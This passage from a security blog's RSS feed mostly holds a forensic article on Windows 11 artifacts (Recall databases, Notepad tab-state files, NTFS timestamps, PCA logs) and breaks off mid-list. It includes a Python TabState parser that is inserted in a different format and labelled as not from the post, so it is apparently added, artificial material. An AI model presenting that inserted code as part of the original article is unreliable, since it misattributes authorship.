  754. <li>Treat public threats as short-horizon indicators rather than long-range forecasts.</li>
  755. <li>Invest in continuous monitoring across Telegram and related ecosystems to discover alliance announcements, threat posts, and cross-posted &#8220;proof&#8221; rapidly.</li>
  756. </ul>
  757. <p>Even organizations outside geopolitical conflict zones should assume exposure: hacktivist campaigns seek reach and spectacle, not narrow geography, and hashtags remain a practical lens for separating noise from signals that demand action.</p>
  758. <p><strong>To download the full report, please fill in the form below.</strong></p>
  759. <p><script data-b24-form="inline/1808/7dlezh" data-skip-moving="true">
  760.              (function (w, d, u) {
  761.                var s = d.createElement("script");
  762.                s.async = true;
  763.                s.src = u + "?" + ((Date.now() / 180000) | 0);
  764.                var h = d.getElementsByTagName("script")[0];
  765.                h.parentNode.insertBefore(s, h);
  766.              })(window, document, "https://cdn.bitrix24.eu/b30707545/crm/form/loader_1808.js");
  767.            </script><br />
  768.            <script src="https://storage.yandexcloud.net/kasperskyform/validator.js"></script><br />
  769.            <script>
  770.              initBxFormValidator({
  771.                formId: "inline/1808/7dlezh",
  772.                emailFieldName: "CONTACT_EMAIL",
  773.                redirectUrl: "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13172551/Hacktivist_report-DFI-META.pdf",
  774.                naturalFieldNames: ["CONTACT_UF_CRM_NODES"],
  775.                lengthRestrictedFieldNames: {
  776.                  CONTACT_EMAIL: 250,
  777.                  CONTACT_POST: 128,
  778.                  CONTACT_NAME: 50,
  779.                  CONTACT_UF_CRM_COMPANY: 255,
  780.                  CONTACT_UF_CRM_COMPANY_TAX_ID: 50,
  781.                  CONTACT_UF_CRM_PRODUCT_INTEREST: 255,
  782.                  CONTACT_UF_CRM_FORM_QUESTION_2: 255,
  783.                  CONTACT_UF_CRM_FORM_QUESTION_3: 255,
  784.                  CONTACT_UF_CRM_FORM_QUESTION_5: 255,
  785.                },
  786.              });
  787.            </script></p>
  788. ]]></content:encoded>
  789. <wfw:commentRss>https://securelist.com/dfi-meta-hacktivist-report/117708/feed/</wfw:commentRss>
  790. <slash:comments>0</slash:comments>
  791. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200.jpg" width="1200" height="762"><media:keywords>full</media:keywords></media:content>
  792. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-1024x650.jpg" width="1024" height="650"><media:keywords>large</media:keywords></media:content>
  793. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-300x191.jpg" width="300" height="191"><media:keywords>medium</media:keywords></media:content>
  794. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/14082820/SL-DFI-META-report-featured-1200-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  795. </item>
  796. <item>
  797. <title>The king is dead, long live the king! Windows 10 EOL and Windows 11 forensic artifacts</title>
  798. <link>https://securelist.com/forensic-artifacts-in-windows-11/117680/</link>
  799. <comments>https://securelist.com/forensic-artifacts-in-windows-11/117680/#respond</comments>
  800. <dc:creator><![CDATA[Kirill Magaskin]]></dc:creator>
  801. <pubDate>Tue, 14 Oct 2025 08:00:57 +0000</pubDate>
  802. <category><![CDATA[Research]]></category>
  803. <category><![CDATA[Microsoft Windows]]></category>
  804. <category><![CDATA[Digital forensics]]></category>
  805. <category><![CDATA[Forensic journey]]></category>
  806. <category><![CDATA[Cybersecurity]]></category>
  807. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117680</guid>
  808.  
  809. <description><![CDATA[With the end of Windows 10 support approaching, we discuss which forensic artifacts in Windows 11 may be of interest.]]></description>
  810. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/13154941/SL-forensic-artifacts-in-windows-11-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
  811. <p>Windows 11 was released a few years ago, yet it has seen relatively weak enterprise adoption. According to statistics from our Global Emergency Response Team (GERT) investigations, as recently as early 2025, we found that Windows 7, which reached end of support in 2020, was encountered only slightly less often than the newest operating system. Most systems still run Windows 10.</p>
  813. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of Windows versions in organizations&#8217; infrastructure. The statistics are based on the Global Emergency Response Team (GERT) data (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10100944/01-en-ru-es-pt-br-win-11-graph.png" target="_blank" rel="noopener">download</a>)</em></p>
  814. <p>The most widely used operating system was released more than a decade ago, and Microsoft discontinues its support on October 14, 2025. This means we are certainly going to see an increase in the number of Windows 11 systems in organizations where we provide incident response services. This is why we decided to offer a brief overview of changes to forensic artifacts in this operating system. The information should be helpful to our colleagues in the field. The artifacts described here are relevant for Windows 11 24H2, which is the latest OS version at the time of writing this.</p>
  815. <h2 id="what-is-new-in-windows-11">What is new in Windows 11</h2>
  816. <h3 id="recall">Recall</h3>
  817. <p>The Recall feature was first introduced in May 2024. It allows the computer to remember everything a user has done on the device over the past few months. It works by taking screenshots of the entire display every few seconds. A local AI engine then analyzes these screenshots in the background, extracting all useful information, which is subsequently saved to a database. This database is then used for intelligent searching. Since May 2025, Recall has been broadly available on computers equipped with an NPU, a dedicated chip for AI computations, which is currently compatible only with ARM CPUs.</p>
  818. <p>Microsoft Recall is certainly one of the most highly publicized and controversial features announced for Windows 11. Since its initial reveal, it <a href="https://www.kaspersky.com/blog/how-to-disable-copilot-recall-spyware/51522/" target="_blank" rel="noopener">has been the subject of criticism within the cybersecurity community</a> because of the potential threat it poses to data privacy. Microsoft refined Recall before its release, yet <a href="https://www.kaspersky.com/blog/recall-2025-risks-benefits/53407/" target="_blank" rel="noopener">certain concerns remain</a>. Because of its controversial nature, the option is disabled by default in corporate builds of Windows 11. However, examining the artifacts it creates is worthwhile, just in case an attacker or malicious software activates it. In theory, an organization&#8217;s IT department could enable Recall using Group Policies, but we consider that scenario unlikely.</p>
  819. <p>As previously mentioned, Recall takes screenshots, which naturally requires temporary storage before analysis. The raw JPEG images can be found at <code>%AppData%\Local\CoreAIPlatform.00\UKP\{GUID}\ImageStore\*</code>. The filenames themselves are the screenshot identifiers (more on those later).</p>
  820. <p>Along with the screenshots, their metadata is stored within the standard Exif.Photo.MakerNote (0x927c) tag. This tag holds a significant amount of interesting data, such as the boundaries of the foreground window, the capture timestamp, the window title, the window identifier, and the full path of the process that launched the window. Furthermore, if a browser is in use during the screenshot capture, the URI and domain may be preserved, among other details.</p>
  821. <p>Recall is activated on a per-user basis. A key in the user&#8217;s registry hive, specifically <code>Software\Policies\Microsoft\Windows\WindowsAI\</code>, is responsible for enabling and disabling the saving of these screenshots. Microsoft has also introduced <a href="https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai" target="_blank" rel="noopener">several new registry keys</a> associated with Recall management in the latest Windows 11 builds.</p>
  822. <p>It is important to note that the version of the feature refined following public controversy includes a specific filter intended to prevent the saving of screenshots and text when potentially sensitive information is on the screen. This includes, for example, an incognito browser window, a payment data input field, or a password manager. However, <a href="https://doublepulsar.com/microsoft-recall-on-copilot-pc-testing-the-security-and-privacy-implications-ddb296093b6c" target="_blank" rel="noopener">researchers</a> have indicated that this filter may not always engage reliably.</p>
  823. <p>To enable fast searches across all data captured from screenshots, the system uses two DiskANN vector databases (<code>SemanticTextStore.sidb</code> and <code>SemanticImageStore.sidb</code>). However, the standard SQLite database is the most interesting one for investigation: <code>%AppData%\Local\CoreAIPlatform.00\UKP\{GUID}\ukg.db</code>, which consists of 20 tables. In the latest release, it is accessible without administrative privileges, yet it is encrypted. At the time of writing this post, there are no publicly known methods to decrypt the database directly. Therefore, we will examine the most relevant tables from the 2024 Windows 11 beta release with Recall.</p>
  824. <ul>
  825. <li>The <code>App</code> table holds data about the process that launched the application&#8217;s graphical user interface window.</li>
  826. <li>The <code>AppDwellTime</code> table contains information such as the full path of the process that initiated the application GUI window (WindowsAppId column), the date and time it was launched (HourOfDay, DayOfWeek, HourStartTimestamp), and the duration for which the window was displayed (DwellTime).</li>
  827. <li>The <code>WindowCapture</code> table records the type of event (Name column):
  828. <ul>
  829. <li><strong>WindowCreatedEvent</strong> indicates the creation of the first instance of the application window. It can be correlated with the process that created the window.</li>
  830. <li><strong>WindowChangedEvent</strong> tracks changes to the window instance. It allows monitoring movements or size changes of the window instance with the help of the WindowId column, which contains the window&#8217;s identifier.</li>
  831. <li><strong>WindowCaptureEvent</strong> signifies the creation of a screen snapshot that includes the application window. Besides the window identifier, it contains an image identifier (ImageToken). The value of this token can later be used to retrieve the JPEG snapshot file from the aforementioned ImageStore directory, as the filename corresponds to the image identifier.</li>
  832. <li><strong>WindowDestroyedEvent</strong> signals the closing of the application window.</li>
  833. <li><strong>ForegroundChangedEvent</strong> does not contain useful data from a forensics perspective.</li>
  834. </ul>
  835. <p>The <code>WindowCapture</code> table also includes a flag indicating whether the application window was in the foreground (IsForeground column), the window boundaries as screen coordinates (WindowBounds), the window title (WindowTitle), a service field for properties (Properties), and the event timestamp (TimeStamp).
  836. </li>
  837. </ul>
  838. <ul>
  839. <li><code>WindowCaptureTextIndex_content</code> contains the text extracted with Optical Character Recognition (OCR) from the snapshot (c2 column), the window title (WindowTitle), the application path (App.Path), the snapshot timestamp (TimeStamp), and the name (Name). This table can be used in conjunction with the WindowCapture table (the c0 and Id columns hold identical data, which can be used for joining the tables) and the App table (identical data resides in the AppId and Id columns).</li>
  840. </ul>
  841. <p>Recall artifacts (if the feature was enabled on the system prior to the incident) represent a &#8220;goldmine&#8221; for the incident responder. They allow for a detailed reconstruction of the attacker&#8217;s activity within the compromised system. Conversely, this same functionality can be weaponized: as mentioned previously, the private information filter in Recall does not work flawlessly. Consequently, attackers and malware can exploit it to locate credentials and other sensitive information.</p>
  842. <h3 id="updated-standard-applications">Updated standard applications</h3>
  843. <p>Standard applications in Windows 11 have also undergone updates, and for some, this involved changes to both the interface and functionality. Specifically, applications such as Notepad, File Explorer, and the Command Prompt in this version of the OS now support multi-tab mode. Notably, Notepad retains the state of these tabs even after the process terminates. Therefore, Windows 11 now has new artifacts associated with the usage of this application. Our colleague, AbdulRhman Alfaifi, researched these in detail; his work is available <a href="https://u0041.co/posts/articals/exploring-windows-artifacts-notepad-files/" target="_blank" rel="noopener">here</a>.</p>
  844. <p>The main directory for Notepad artifacts in Windows 11 is located at <code>%LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\</code>.<br />
  845. This directory contains two subdirectories:</p>
  846. <ul>
  847. <li><strong>TabState</strong> stores a {GUID}.bin state file for each Notepad tab. This file contains the tab&#8217;s contents if the user did not save it to a file. For saved tabs, the file contains the full path to the saved content, the SHA-256 hash of the content, the content itself, the last write time to the file, and other details.</li>
  848. <li><strong>WindowsState</strong> stores information about the application window state. This includes the total number of tabs, their order, the currently active tab, and the size and position of the application window on the screen. The state file is named either *.0.bin or *.1.bin.</li>
  849. </ul>
  850. <p>The structure of {GUID}.bin for saved tabs is as follows:</p>
  851. <table>
  852. <tbody>
  853. <tr>
  854. <td><strong>Field</strong></td>
  855. <td><strong>Type</strong></td>
  856. <td><strong>Value and explanation</strong></td>
  857. </tr>
  858. <tr>
  859. <td>signature</td>
  860. <td>[u8;2]</td>
  861. <td>NP</td>
  862. </tr>
  863. <tr>
  864. <td>?</td>
  865. <td>u8</td>
  866. <td>00</td>
  867. </tr>
  868. <tr>
  869. <td>file_saved_to_path</td>
  870. <td>bool</td>
  871. <td>00 = the file was not saved at the specified path<br />
  872. 01 = the file was saved</td>
  873. </tr>
  874. <tr>
  875. <td>path_length</td>
  876. <td>uLEB128</td>
  877. <td>Length of the full path (in characters) to the file where the tab content was written</td>
  878. </tr>
  879. <tr>
  880. <td>file_path</td>
  881. <td>UTF-16LE</td>
  882. <td>The full path to the file where the tab content was written</td>
  883. </tr>
  884. <tr>
  885. <td>file_size</td>
  886. <td>uLEB128</td>
  887. <td>The size of the file on disk where the tab content was written</td>
  888. </tr>
  889. <tr>
  890. <td>encoding</td>
  891. <td>u8</td>
  892. <td>File encoding:<br />
  893. 0x01 – ANSI<br />
  894. 0x02 – UTF-16LE<br />
  895. 0x03 – UTF-16BE<br />
  896. 0x04 – UTF-8BOM<br />
  897. 0x05 – UTF-8</td>
  898. </tr>
  899. <tr>
  900. <td>cr_type</td>
  901. <td>u8</td>
  902. <td>Type of carriage return:<br />
  903. 0x01 — CRLF<br />
  904. 0x02 — CR<br />
  905. 0x03 — LF</td>
  906. </tr>
  907. <tr>
  908. <td>last_write_time</td>
  909. <td>uLEB128</td>
  910. <td>The time of the last write (tab save) to the file, formatted as <a href="https://learn.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-filetime?redirectedfrom=MSDN" target="_blank" rel="noopener">FILETIME</a></td>
  911. </tr>
  912. <tr>
  913. <td>sha256_hash</td>
  914. <td>[u8;32]</td>
  915. <td>The SHA-256 hash of the tab content</td>
  916. </tr>
  917. <tr>
  918. <td>?</td>
  919. <td>[u8;2]</td>
  920. <td>00 01</td>
  921. </tr>
  922. <tr>
  923. <td>selection_start</td>
  924. <td>uLEB128</td>
  925. <td>The offset of the selection start from the beginning of the file</td>
  926. </tr>
  927. <tr>
  928. <td>selection_end</td>
  929. <td>uLEB128</td>
  930. <td>The offset of the selection end from the beginning of the file</td>
  931. </tr>
  932. <tr>
  933. <td>config_block</td>
  934. <td>ConfigBlock</td>
  935. <td>ConfigBlock structure configuration</td>
  936. </tr>
  937. <tr>
  938. <td>content_length</td>
  939. <td>uLEB128</td>
  940. <td>The length of the text in the file</td>
  941. </tr>
  942. <tr>
  943. <td>content</td>
  944. <td>UTF-16LE</td>
  945. <td>The file content before it was modified by the new data. This field is absent if the tab was saved to disk with no subsequent modifications.</td>
  946. </tr>
  947. <tr>
  948. <td>contain_unsaved_data</td>
  949. <td>bool</td>
  950. <td>00 = the tab content in the {GUID}.bin file matches the tab content in the file on disk<br />
  951. 01 = changes to the tab have not been saved to disk</td>
  952. </tr>
  953. <tr>
  954. <td>checksum</td>
  955. <td>[u8;4]</td>
  956. <td>The CRC32 checksum of the {GUID}.bin file content, computed over the bytes starting at offset 0x03 from the start of the file</td>
  957. </tr>
  958. <tr>
  959. <td>unsaved_chunks</td>
  960. <td>[UnsavedChunk]</td>
  961. <td>A list of UnsavedChunk structures. This is absent if the tab was saved to disk with no subsequent modifications</td>
  962. </tr>
  963. </tbody>
  964. </table>
  965. <div id="attachment_117682" style="width: 903px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117682" class="size-full wp-image-117682" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg" alt="Example content of the {GUID.bin} file for a Notepad tab that was saved to a file and then modified with new data which was not written to the file" width="893" height="622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2.jpeg 893w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-300x209.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-768x535.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-502x350.jpeg 502w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-740x515.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-402x280.jpeg 402w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102005/forensic-artifacts2-800x557.jpeg 800w" sizes="auto, (max-width: 893px) 100vw, 893px" /></a><p id="caption-attachment-117682" class="wp-caption-text">Example content of the {GUID.bin} file for a Notepad tab that was saved to a file and then modified with new data which was not written to the file</p></div>
  966. <p>For tabs that were never saved, the {GUID}.bin file structure in the TabState directory is shorter:</p>
  967. <table>
  968. <tbody>
  969. <tr>
  970. <td><strong>Field</strong></td>
  971. <td><strong>Type</strong></td>
  972. <td><strong>Value and explanation</strong></td>
  973. </tr>
  974. <tr>
  975. <td>signature</td>
  976. <td>[u8;2]</td>
  977. <td>NP</td>
  978. </tr>
  979. <tr>
  980. <td>?</td>
  981. <td>u8</td>
  982. <td>00</td>
  983. </tr>
  984. <tr>
  985. <td>file_saved_to_path</td>
  986. <td>bool</td>
  987. <td>00 = the file was not saved at the specified path (always)</td>
  988. </tr>
  989. <tr>
  990. <td>selection_start</td>
  991. <td>uLEB128</td>
  992. <td>The offset of the selection start from the beginning of the file</td>
  993. </tr>
  994. <tr>
  995. <td>selection_end</td>
  996. <td>uLEB128</td>
  997. <td>The offset of the selection end from the beginning of the file</td>
  998. </tr>
  999. <tr>
  1000. <td>config_block</td>
  1001. <td>ConfigBlock</td>
  1002. <td>ConfigBlock structure configuration</td>
  1003. </tr>
  1004. <tr>
  1005. <td>content_length</td>
  1006. <td>uLEB128</td>
  1007. <td>The length of the text in the file</td>
  1008. </tr>
  1009. <tr>
  1010. <td>content</td>
  1011. <td>UTF-16LE</td>
  1012. <td>File content</td>
  1013. </tr>
  1014. <tr>
  1015. <td>contain_unsaved_data</td>
  1016. <td>bool</td>
  1017. <td>01 = changes to the tab have not been saved to disk (always)</td>
  1018. </tr>
  1019. <tr>
  1020. <td>checksum</td>
  1021. <td>[u8;4]</td>
  1022. <td>The CRC32 checksum of the {GUID}.bin file content, computed over the bytes starting at offset 0x03 from the start of the file</td>
  1023. </tr>
  1024. <tr>
  1025. <td>unsaved_chunks</td>
  1026. <td>[UnsavedChunk]</td>
  1027. <td>List of UnsavedChunk structures</td>
  1028. </tr>
  1029. </tbody>
  1030. </table>
  1031. <div id="attachment_117683" style="width: 1190px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117683" class="size-full wp-image-117683" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg" alt="Example content of the {GUID.bin} file for a Notepad tab that has not been saved to a file" width="1180" height="207" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3.jpeg 1180w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-300x53.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-1024x180.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-768x135.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-740x130.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102254/forensic-artifacts3-800x140.jpeg 800w" sizes="auto, (max-width: 1180px) 100vw, 1180px" /></a><p id="caption-attachment-117683" class="wp-caption-text">Example content of the {GUID.bin} file for a Notepad tab that has not been saved to a file</p></div>
  1032. <p>Note that the saving of tabs may be disabled in the Notepad settings. If this is the case, the TabState and WindowsState artifacts will be unavailable for analysis.</p>
  1033. <p>If these artifacts are available, however, you can use <a href="https://github.com/AbdulRhmanAlfaifi/notepad_parser" target="_blank" rel="noopener">the notepad_parser tool</a>, developed by our colleague Abdulrhman Alfaifi, to automate working with them.</p>
  1034. <p>This particular artifact may assist in recovering the contents of malicious scripts and batch files. Furthermore, it may contain the results and logs from network scanners, credential extraction utilities, and other executables used by threat actors, assuming any unsaved modifications were inadvertently made to them.</p>
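<p>As an added example (not the notepad_parser tool or any code from this post), the following Python reads the header of a saved-tab {GUID}.bin file in exactly the field order and types given in the saved-tab table above, decoding the uLEB128 lengths, the UTF-16LE path and the FILETIME timestamp, and stops at the start of the ConfigBlock, whose layout the table does not describe. The path, content and timestamp in the sample bytes are constructed for the demonstration.</p>

```python
"""Parse the header of a Notepad TabState {GUID}.bin file for a saved tab.
Field order and types follow the saved-tab table; parsing stops at config_block,
whose layout (like UnsavedChunk) is not documented there. Sample data is constructed."""
import hashlib
from datetime import datetime, timedelta, timezone

ENCODINGS = {1: "ANSI", 2: "UTF-16LE", 3: "UTF-16BE", 4: "UTF-8BOM", 5: "UTF-8"}
CR_TYPES = {1: "CRLF", 2: "CR", 3: "LF"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def read_uleb128(buf, pos):
    """Decode an unsigned LEB128 integer at buf[pos]; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def write_uleb128(value):
    """Encode an unsigned integer as LEB128 (used to build the sample file)."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)


def filetime_to_datetime(ft):
    """Convert a FILETIME (100 ns ticks since 1601-01-01 UTC) to a datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, used to build the sample file."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_saved_tab_header(buf):
    """Return the header fields of a saved-tab TabState file as a dict."""
    if buf[:3] != b"NP\x00":
        raise ValueError("bad signature: not a TabState file")
    if buf[3] != 0x01:
        # file_saved_to_path == 0 means the shorter unsaved-tab layout
        raise ValueError("file_saved_to_path is 0: unsaved-tab layout, not parsed here")
    pos = 4
    path_len, pos = read_uleb128(buf, pos)           # length in UTF-16 characters
    file_path = buf[pos:pos + 2 * path_len].decode("utf-16-le")
    pos += 2 * path_len
    file_size, pos = read_uleb128(buf, pos)
    encoding, cr_type = buf[pos], buf[pos + 1]
    pos += 2
    last_write, pos = read_uleb128(buf, pos)
    sha256 = buf[pos:pos + 32]
    pos += 32
    if buf[pos:pos + 2] != b"\x00\x01":
        raise ValueError("expected 00 01 marker after sha256_hash")
    pos += 2
    sel_start, pos = read_uleb128(buf, pos)
    sel_end, pos = read_uleb128(buf, pos)
    return {
        "file_path": file_path,
        "file_size": file_size,
        "encoding": ENCODINGS.get(encoding, f"unknown(0x{encoding:02x})"),
        "cr_type": CR_TYPES.get(cr_type, f"unknown(0x{cr_type:02x})"),
        "last_write_time": filetime_to_datetime(last_write),
        "sha256": sha256.hex(),
        "selection": (sel_start, sel_end),
        "config_block_offset": pos,  # where the undocumented ConfigBlock begins
    }


# Constructed sample: a tab saved to notes.txt as UTF-8 with CRLF line endings.
SAMPLE_PATH = "C:\\Users\\analyst\\Desktop\\notes.txt"
SAMPLE_CONTENT = b"hello from notepad\r\n"
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_CONTENT).hexdigest()
SAMPLE_TIME = datetime(2025, 10, 14, 8, 0, tzinfo=timezone.utc)


def build_sample():
    """Assemble the header bytes in the table's field order (constructed data)."""
    return (b"NP" + b"\x00" + b"\x01"
            + write_uleb128(len(SAMPLE_PATH)) + SAMPLE_PATH.encode("utf-16-le")
            + write_uleb128(len(SAMPLE_CONTENT)) + bytes([0x05, 0x01])
            + write_uleb128(datetime_to_filetime(SAMPLE_TIME))
            + hashlib.sha256(SAMPLE_CONTENT).digest() + b"\x00\x01"
            + write_uleb128(0) + write_uleb128(5))
```

Run against a real {GUID}.bin, the header alone yields the saved path, the SHA-256 of the content and the last write time, which is enough to tie the tab to a file on disk and to a point on the timeline.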
  1035. <h2 id="changes-to-familiar-artifacts-in-windows-11">Changes to familiar artifacts in Windows 11</h2>
  1036. <p>In addition to the new artifacts, Windows 11 introduced several noteworthy changes to existing ones that investigators should be aware of when analyzing incidents.</p>
  1037. <h3 id="changes-to-ntfs-attribute-behavior">Changes to NTFS attribute behavior</h3>
  1038. <p>The behavior of NTFS attributes was changed between Windows 10 and Windows 11 in two $MFT structures: $STANDARD_INFORMATION and $FILE_NAME.</p>
  1039. <p>The changes to the behavior of the $STANDARD_INFORMATION attributes are presented in the table below:</p>
  1040. <table>
  1041. <tbody>
  1042. <tr>
  1043. <td><strong>Event</strong></td>
  1044. <td>Access file</td>
  1045. <td>Rename file</td>
  1046. <td>Copy file to new folder</td>
  1047. <td>Move file within one volume</td>
  1048. <td>Move file between volumes</td>
  1049. </tr>
  1050. <tr>
  1051. <td><strong>Win 10<br />
  1052. 1903</strong></td>
  1053. <td>The File Access timestamp is updated. However, it remains unchanged if the system volume is larger than 128 GB</td>
  1054. <td>The File Access timestamp remains unchanged</td>
  1055. <td>The copy metadata is updated</td>
  1056. <td>The File Access timestamp remains unchanged</td>
  1057. <td>The metadata is inherited from the original file</td>
  1058. </tr>
  1059. <tr>
  1060. <td><strong>Win 11 24H2</strong></td>
  1061. <td>The File Access timestamp is updated</td>
  1062. <td>The File Access timestamp is updated to match the modification time</td>
  1063. <td>The copy metadata is inherited from the original file</td>
  1064. <td>The File Access timestamp is updated to match the moving time</td>
  1065. <td>The metadata is updated</td>
  1066. </tr>
  1067. </tbody>
  1068. </table>
<p>Behavior of the $FILE_NAME attributes was changed as follows:</p>
  1070. <table>
  1071. <tbody>
  1072. <tr>
  1073. <td><strong>Event</strong></td>
  1074. <td>Rename file</td>
  1075. <td>Move file via Explorer within one volume</td>
  1076. <td>Move file to Recycle Bin</td>
  1077. </tr>
  1078. <tr>
  1079. <td><strong>Win 10<br />
  1080. 1903</strong></td>
  1081. <td>The timestamps and metadata remain unchanged</td>
  1082. <td>The timestamps and metadata remain unchanged</td>
  1083. <td>The timestamps and metadata remain unchanged</td>
  1084. </tr>
  1085. <tr>
  1086. <td><strong>Win 11 24H2</strong></td>
  1087. <td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td>
  1088. <td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td>
  1089. <td>The File Access and File Modify timestamps along with the metadata are inherited from the previous version of $STANDARD_INFORMATION</td>
  1090. </tr>
  1091. </tbody>
  1092. </table>
  1093. <p>Analysts should consider these changes when examining the service files of the NTFS file system.</p>
  1094. <h3 id="program-compatibility-assistant">Program Compatibility Assistant</h3>
<p>Program Compatibility Assistant (PCA) first appeared in 2006 with the release of Windows Vista. It detects compatibility problems in applications written for older versions of Windows and applies fixes so that they can run. Because it records program launches while doing so, it is a relevant artifact for identifying evidence of program execution.</p>
  1096. <p>Windows 11 introduced new files associated with this feature that are relevant for forensic analysis of application executions. These files are located in the directory <code>C:\Windows\appcompat\pca\</code>:</p>
  1097. <ul>
  1098. <li><code>PcaAppLaunchDic.txt</code>: each line in this file contains data on the most recent launch of a specific executable file. This information includes the time of the last launch formatted as YYYY-MM-DD HH:MM:SS.f (UTC) and the full path to the file. A pipe character (|) separates the data elements. When the file is run again, the information in the corresponding line is updated. The file uses ANSI (CP-1252) encoding, so executing files with Unicode in their names &#8220;breaks&#8221; it: new entries (including the entry for running a file with Unicode) stop appearing, only old ones get updated.</li>
  1099. </ul>
  1100. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-117684" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png" alt="" width="1007" height="306" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4.png 1007w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-300x91.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-768x233.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-740x225.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-921x280.png 921w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/10102559/forensic-artifacts4-800x243.png 800w" sizes="auto, (max-width: 1007px) 100vw, 1007px" /></a></p>
  1101. <ul>
  1102. <li><code>PcaGeneralDb0.txt</code> and <code>PcaGeneralDb1.txt</code> alternate during data logging: new records are saved to the primary file until its size reaches two megabytes. Once that limit is reached, the secondary file is cleared and becomes the new primary file, and the full primary file is then designated as the secondary. This cycle repeats indefinitely. The data fields are delimited with a pipe (|). The file uses UTF-16LE encoding and contains the following fields:
  1103. <ul>
  1104. <li>Executable launch time (YYYY-MM-DD HH:MM:SS.f (UTC))</li>
  1105. <li>Record type (0–4):
  1106. <ul>
  1107. <li>0 = installation error</li>
  1108. <li>1 = driver blocked</li>
  1109. <li>2 = abnormal process exit</li>
  1110. <li>3 = PCA Resolve call (component responsible for fixing compatibility issues when running older programs)</li>
  1111. <li>4 = value not set</li>
  1112. </ul>
  1113. </li>
  1114. <li>Path to executable file. This path omits the volume letter and frequently uses environment variables (%USERPROFILE%, %systemroot%, %programfiles%, and others).</li>
  1115. <li>Product name (from the PE header, lowercase)</li>
